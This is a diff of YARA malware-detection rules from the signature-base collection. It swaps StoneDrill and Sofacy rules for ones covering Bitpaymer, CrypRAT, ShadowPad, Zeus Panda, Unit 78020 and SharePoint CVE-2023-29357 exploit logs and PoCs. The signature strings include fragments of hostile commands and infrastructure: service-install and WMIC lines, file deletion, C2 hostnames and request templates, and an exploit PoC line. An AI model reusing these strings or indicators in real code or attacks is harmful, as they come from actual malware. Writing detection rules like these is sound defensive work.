 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 700000 and pe.number_of_sections > 4 and pe.number_of_resources > 1 and pe.number_of_resources < 15 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( ( math.entropy ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) > 7.8 ) and pe.resources [ i ] . id == 101 and pe.resources [ i ] . length > 20000 and pe.resources [ i ] . language == 0 and not ( $mz in ( pe.resources [ i ] . offset..pe.resources [ i ] . offset + pe.resources [ i ] . length ) ) )
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and all of them
 }
-rule SIGNATURE_BASE_Stonedrill_Main_Sub : FILE
+rule SIGNATURE_BASE_SUSP_PE_Compromised_Certificate_Feb25 : FILE
 {
 	meta:
-		description = "Rule to detect StoneDrill (decrypted) samples"
-		author = "Kaspersky Lab"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L43-L56"
+		description = "Detects suspicious PE files signed with a certificate used in a widespread phishing attack in February 2025"
+		author = "Jonathan Peters"
+		id = "2e6ad630-b24e-53b2-8ffe-622c51914568"
+		date = "2025-02-14"
+		modified = "2025-03-20"
+		reference = "https://x.com/DTCERT/status/1890384162818802135"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L62-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "794094c0cbb81f6f971e16de36d444351b17cf38a91d8210f914b80da7d9ed26"
-		score = 75
+		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
+		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
+		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
+		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
+		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
+		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
+		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
+		logic_hash = "8f352ce00bcb64427bef89a9fc180d2451aeb4aa05432881a4754b4fb503c94a"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "d01781f1246fd1b64e09170bd6600fe1"
-		hash2 = "ac3c25534c076623192b9381f926ba0d"
-		version = "1.0"
 
 	strings:
-		$code = {B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF 30 8F 44 24 ?? 8B ?? 24 [1 - 4] 2B ?? 24 [6] F7 ?1 [5 - 12] 00}
+		$sb1 = { 44 B8 66 73 57 BB 95 65 1D 61 D0 61 }
+		$sb2 = { 4F 23 43 D9 61 54 B9 41 DB 0A 26 B2 }
+		$sb3 = { 40 A3 62 E3 50 68 91 19 F5 2E C3 4C }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $code and filesize < 5000000
+		uint16( 0 ) == 0x5a4d and filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_Stonedrill_BAT_1 : FILE
+rule SIGNATURE_BASE_Bitpaymer_1
 {
 	meta:
-		description = "Rule to detect Batch file from StoneDrill report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
+		description = "Rule to detect newer Bitpaymer samples. Rule is based on BitPaymer custom packer"
+		author = "Morphisec labs"
+		id = "916de232-1f1b-5853-a57f-623812cfed16"
+		date = "2019-10-30"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L65-L80"
+		reference = "http://blog.morphisec.com/bitpaymer-ransomware-with-new-custom-packer-framework"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crime_bitpaymer.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7263a527cae45072082c0f2fd0abc33acb2a25b34c06becf36fbd36f0697d5c"
+		logic_hash = "0c236794c04f0805d4611cfaf43369eeb4d0e65d6c697e6c5e6afd321fbca629"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "set u100=" ascii
-		$s2 = "set u200=service" ascii fullword
-		$s3 = "set u800=%~dp0" ascii fullword
-		$s4 = "\"%systemroot%\\system32\\%u100%\"" ascii
-		$s5 = "%\" start /b %systemroot%\\system32\\%" ascii
+		$opcodes1 = {B9 ?? 00 00 00 FF 14 0F B8 FF 00 00 00 C3 89 45 FC}
+		$opcodes2 = {61 55 FF 54 B7 01 B0 FF C9 C3 CC 89 45 FC}
 
 	condition:
-		uint32( 0 ) == 0x68636540 and 2 of them and filesize < 500
+		( uint16( 0 ) == 0x5a4d ) and ( $opcodes1 or $opcodes2 )
 }
-rule SIGNATURE_BASE_Stonedrill_Service_Install : FILE
+
+rule SIGNATURE_BASE_MAL_Cryprat_Jan19_1 : FILE
 {
 	meta:
-		description = "Rule to detect Batch file from StoneDrill report"
+		description = "Detects CrypRAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
+		id = "f3063a16-8813-5d6c-9807-6a0725907fb5"
+		date = "2019-01-07"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L82-L96"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_cryp_rat.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52abe90c7f87ffeace4b58f9959e5a21c475bfa7ae2c5bc2744fe5fe43ffdda8"
-		score = 75
+		logic_hash = "69f8a581bae1a2c411e09e8fe01a979645ef897038af868d8e9f2a2ce9188080"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "127.0.0.1 >nul && sc config" ascii
-		$s2 = "LocalService\" && ping -n" ascii fullword
-		$s3 = "127.0.0.1 >nul && sc start" ascii fullword
-		$s4 = "sc config NtsSrv binpath= \"C:\\WINDOWS\\system32\ntssrvr64.exe" ascii
+		$x1 = "Cryp_RAT" fullword wide
 
 	condition:
-		2 of them and filesize < 500
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "2524e5e9fe04d7bfe5efb3a5e400fe4b" or 1 of them )
 }
-rule SIGNATURE_BASE_Stonedrill_Ntssrvr32 : FILE
+
+rule SIGNATURE_BASE_Shadowpad_Nssock2 : FILE
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
+		description = "Detects malicious nssock2.dll from ShadowPad incident - file nssock2.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L98-L118"
+		id = "47ecc7f8-065a-558b-9bba-300fd28f4eab"
+		date = "2017-08-15"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/shadowpad-in-corporate-networks/81432/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shadowpad.yar#L13-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f1122aba53f32b10bd5f43cb619aa5d668b1457f3a5ea2a68c97254ab8631faa"
+		logic_hash = "ea9675d5acfdc80cfa787db2c2dfe2169aa7c5e3ead35f020d0b0b664ecb4bf4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
-
-	strings:
-		$s1 = "g\\system32\\" wide
-		$s2 = "ztvttw" fullword wide
-		$s3 = "lwizvm" fullword ascii
-		$op1 = { 94 35 77 73 03 40 eb e9 }
-		$op2 = { 80 7c 41 01 00 74 0a 3d }
-		$op3 = { 74 0a 3d 00 94 35 77 }
+		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+		hash2 = "c45116a22cf5695b618fcdf1002619e8544ba015d06b2e1dbf47982600c7545f"
+		hash3 = "696be784c67896b9239a8af0a167add72b1becd3ef98d03e99207a3d5734f6eb"
+		hash4 = "515d3110498d7b4fdb451ed60bb11cd6835fcff4780cb2b982ffd2740e1347a0"
+		hash5 = "536d7e3bd1c9e1c2fd8438ab75d6c29c921974560b47c71686714d12fb8e9882"
+		hash6 = "637fa40cf7dd0252c87140f7895768f42a370551c87c37a3a77aac00eb17d72e"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "c67de089f2009b21715744762fc484e8" or pe.imphash ( ) == "11522f7d4b2fc05acba8f534ca1b828a" ) )
 }
-rule SIGNATURE_BASE_Stonedrill_Malware_2 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L120-L145"
+		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-29357 on Microsoft SharePoint servers with the published Python POC"
+		author = "Florian Roth (with help from @LuemmelSec)"
+		id = "9fa77216-c0d6-55e5-bbcc-adb9438ca456"
+		date = "2023-09-28"
+		modified = "2023-10-01"
+		reference = "https://twitter.com/Gi7w0rm/status/1706764212704591953?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb1f8b24465ad8ca19dd540b1f8b63a73bc2624958bf45547b15c10583d07281"
-		score = 75
+		logic_hash = "03e3a4715c8683dc8d03ad6720c1c9b40482bd0bfa3020aa1152565ec9ec929f"
+		score = 70
 		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+		tags = "CVE-2023-29357"
 
 	strings:
-		$s1 = "cmd /c WMIC Process Call Create \"C:\\Windows\\System32\\Wscript.exe //NOLOGO " fullword wide
-		$s2 = "C:\\ProgramData\\InternetExplorer" fullword wide
-		$s3 = "WshShell.CopyFile \"" fullword wide
-		$s4 = "Abd891.tmp" fullword wide
-		$s5 = "Set WshShell = Nothing" fullword wide
-		$s6 = "AaCcdDeFfGhiKLlMmnNoOpPrRsSTtUuVvwWxyZz32" fullword ascii
-		$s7 = "\\FileInfo.txt" wide
-		$x1 = "C-PDI-C-Cpy-T.vbs" fullword wide
-		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
-		$x3 = "C-PDC-C-Cpy-T.vbs" fullword wide
-		$x4 = "AC-PDC-C-Cpy-T.vbs" fullword wide
-		$x5 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+		$xr1 = /GET [a-z\.\/_]{0,40}\/web\/(siteusers|currentuser) - (80|443) .{10,200} (python-requests\/[0-9\.]{3,8}|-) [^ ]{1,160} [^4]0[0-9] /
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or 5 of them
+		$xr1
 }
-rule SIGNATURE_BASE_Stonedrill : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_PY_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
-		date = "2017-03-07"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L147-L170"
+		description = "Detects a Python POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
+		author = "Florian Roth"
+		id = "2be524ab-f360-56b8-9ce3-e15036855c67"
+		date = "2023-10-01"
+		modified = "2023-10-01"
+		reference = "https://github.com/Chocapikk/CVE-2023-29357"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L22-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef7173e259f985083d5451a2d464047b40112a084a05d471797d5dbf2d0fb21d"
-		score = 75
+		logic_hash = "fec7762ab23ba5ee9e793000d080b1d64b93157c6ead9e6939ccfb3c168dd360"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83"
-		hash2 = "62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260"
-		hash3 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+		tags = "CVE-2023-29357, FILE"
 
 	strings:
-		$x1 = "C-Dlt-C-Trsh-T.tmp" fullword wide
-		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
-		$s1 = "Hello dear" fullword ascii
-		$s2 = "WRZRZRAR" fullword ascii
-		$opa1 = { 66 89 45 d8 6a 64 ff }
-		$opa2 = { 8d 73 01 90 0f bf 51 fe }
+		$x1 = "encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or ( all of ( $op* ) and all of ( $s* ) )
+		filesize < 30KB and $x1
 }
-rule SIGNATURE_BASE_Stonedrill_VBS_1 : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_NET_Sharepoint_CVE_2023_29357_Sep23_1 : CVE_2023_29357 FILE
 {
 	meta:
-		description = "Detects malware from StoneDrill threat report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a7ee3bd4-eeae-5eb4-92e7-9601ec17300a"
-		date = "2017-03-07"
+		description = "Detects a C# POC to exploit CVE-2023-29357 on Microsoft SharePoint servers"
+		author = "Florian Roth"
+		id = "aa6aeb00-b162-538c-a670-cbff525dd8f1"
+		date = "2023-10-01"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L172-L192"
+		reference = "https://github.com/LuemmelSec/CVE-2023-29357"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sharepoint_cve_2023_29357.yar#L37-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79416d27a6a09d544becd84f8e551c09b94c97181f8fddc481f47e42763d47ac"
-		score = 75
+		logic_hash = "cf621cc9c5074f531df61623b09db68478e94ae6a9a7acc26aa8d9dde79bd30c"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587"
+		tags = "CVE-2023-29357, FILE"
 
 	strings:
-		$x1 = "wmic /NameSpace:\\\\root\\default Class StdRegProv Call SetStringValue hDefKey = \"&H80000001\" sSubKeyName = \"Software\\Micros" ascii
-		$x2 = "ping 1.0.0.0 -n 1 -w 20000 > nul" fullword ascii
-		$s1 = "WshShell.CopyFile \"%COMMON_APPDATA%\\Chrome\\" ascii
-		$s2 = "WshShell.DeleteFile \"%temp%\\" ascii
-		$s3 = "WScript.Sleep(10 * 1000)" fullword ascii
-		$s4 = "Set WshShell = CreateObject(\"Scripting.FileSystemObject\") While WshShell.FileExists(\"" ascii
-		$s5 = " , \"%COMMON_APPDATA%\\Chrome\\" ascii
+		$x1 = "{f22d2de0-606b-4d16-98d5-421f3f1ba8bc}" ascii wide
+		$x2 = "{F22D2DE0-606B-4D16-98D5-421F3F1BA8BC}" ascii wide
+		$s1 = "Bearer"
+		$s2 = "hashedprooftoken"
+		$s3 = "/_api/web/"
+		$s4 = "X-PROOF_TOKEN"
+		$s5 = "00000003-0000-0ff1-ce00-000000000000"
+		$s6 = "IsSiteAdmin"
 
 	condition:
-		( filesize < 1KB and 1 of ( $x* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Sofacy_Malware_Strangespaces : FILE
+rule SIGNATURE_BASE_Zeus_Panda : FILE
 {
 	meta:
-		description = "Detetcs strange strings from Sofacy malware with many spaces"
+		description = "Detects ZEUS Panda Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60f99b88-f256-5289-852c-c0bf27f1cbd4"
-		date = "2015-12-04"
+		id = "2786b1e0-37af-5595-a24b-56ef3cb928a7"
+		date = "2017-08-04"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L8-L23"
+		reference = "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_zeus_panda.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee8bbebaa0978d038424cee3775ba312476afa014ce0d57c73d6844f758116ca"
+		logic_hash = "63312763196259204dcee6b6c46ae1a16abeab0afabbce9e2e8413131856b04e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd956b2e81731874995b9b92e20f75dbf67ac5f12f9daa194525e1b673c7f83c"
 
 	strings:
-		$s2 = "Delete Temp Folder Service                                  " fullword wide
-		$s3 = " Operating System                        " fullword wide
-		$s4 = "Microsoft Corporation                                       " fullword wide
-		$s5 = " Microsoft Corporation. All rights reserved.               " fullword wide
+		$x1 = "SER32.dll" fullword ascii
+		$x2 = "/c start \"\" \"%s\"" fullword wide
+		$x3 = "del /F \"%s\"" fullword ascii
+		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
+		$s2 = "=> -,0;" fullword ascii
+		$s3 = "Yahoo! Slurp" fullword ascii
+		$s4 = "ZTNHGET ^&" fullword ascii
+		$s5 = "MSIE 9" fullword ascii
+		$s6 = "%s%08x.%s" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Sofacy_Malware_AZZY_Backdoor_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Unit78020_Sep15 : FILE
 {
 	meta:
-		description = "AZZY Backdoor - Sample 1"
+		description = "Detects malware used by Unit78020"
 		author = "Florian Roth (Nextron Systems)"
-		id = "184dc45e-8014-5dcf-a033-d77586c60fdf"
-		date = "2015-12-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L25-L40"
+		id = "d26d401f-3806-5a0b-bdb3-87d5d8af209c"
+		date = "2015-09-24"
+		modified = "2023-01-31"
+		old_rule_name = "Unit78020_Malware_Gen1"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L8-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a9dc96d45702538c2086a749ba2fb467ba8d8b603e513bdef62a024dfeb124cb"
-		logic_hash = "9c99f218d856d374423cada147bc38c8319f9ebff1e43e012143fad7af992d29"
-		score = 75
-		quality = 85
+		logic_hash = "85244d4e2b9e03fa4ab8268ffbedffb839bca598b1e863d3d0b3914294d3ddf0"
+		score = 80
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
+		hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
+		hash3 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
+		hash4 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
+		hash5 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
+		hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
 
 	strings:
-		$s0 = "advstorshell.dll" fullword wide
-		$s1 = "advshellstore.dll" fullword ascii
-		$s2 = "Windows Advanced Storage Shell Extension DLL" fullword wide
+		$x1 = "greensky27.vicp.net" fullword wide
+		$x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		$x4 = "serch.vicp.net" fullword wide
+		$x5 = "greensky27.vicp.net" fullword wide
+		$x6 = "greensky27.vicp.net.as" fullword wide
+		$x7 = "greensky27.vcip.net" fullword wide
+		$x8 = "pnoc-ec.vicp.net" fullword wide
+		$x9 = "aseanph.vicp.net" fullword wide
+		$x10 = "pnoc.vicp.net" fullword wide
+		$sa1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
+		$sa2 = "x-www-form-urlencoded/r/n" wide fullword
+		$sa3 = "/%d%s%d" ascii fullword
+		$sa4 = "dMozilla" wide fullword
+		$sa5 = "Accept-Language:En-us" wide fullword
+		$sb1 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" wide fullword
+		$sb2 = "\\Office Start.lnk" wide fullword
+		$sb3 = "%02d-%02d-%02d %02d:%02d" wide fullword
+		$sc1 = "\\MSN Talk Start.lnk" wide fullword
+		$sc2 = "-GetModuleFileNameExW" ascii fullword
+		$sc3 = "dwError1 = %d" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) )
 }
-rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Implant_1 : FILE
+rule SIGNATURE_BASE_Unit78020_Malware_1 : FILE
 {
 	meta:
-		description = "AZZY Backdoor Implant 4.3 - Sample 1"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec6bf8ca-ccb9-532e-8b0d-1fba59efa2da"
-		date = "2015-12-04"
+		id = "0374de68-98cb-5cb8-a936-fe7845de9330"
+		date = "2015-09-24"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L42-L59"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L60-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c"
-		logic_hash = "b6ddf1274ed78db0c7183e3cc8063c01e4d011bc2947ec05449f3fd0df2050e7"
+		hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
+		logic_hash = "589dfb39630fd396b1f8c5d9d0ecccfc058edfd8e74e3bd06d1bfb9f91ad1798"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\tf394kv.dll" wide
-		$s2 = "DWN_DLL_MAIN.dll" fullword ascii
-		$s3 = "?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z" ascii
-		$s4 = "?Applicate@@YGHXZ" ascii
-		$s5 = "?k@@YGPAUHINSTANCE__@@PBD@Z" ascii
+		$s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
+		$s2 = "msictl.exe" fullword ascii
+		$s3 = "127.0.0.1:8080" fullword ascii
+		$s4 = "mshtml.dat" fullword ascii
+		$s5 = "msisvc" fullword ascii
+		$s6 = "NOKIAN95/WEB" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and 4 of them
 }
-rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Helperdll : FILE
+rule SIGNATURE_BASE_Unit78020_Malware_Gen2 : FILE
 {
 	meta:
-		description = "Dropped C&C helper DLL for AZZY 4.3"
+		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eae089a0-21dc-5d6e-a4bc-7181dc9b8b35"
-		date = "2015-12-04"
+		id = "9492b1f8-c2a9-5e3b-ad62-fbc3d99392b3"
+		date = "2015-09-24"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L61-L76"
+		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L80-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6"
-		logic_hash = "100903551eeacf4266fc97a09949bdafe05e94698bed7cea295c8e970df22ec8"
+		logic_hash = "fd3cb904499a985830543174126761a3cdcff134d61b93b1105a489c00bd042f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
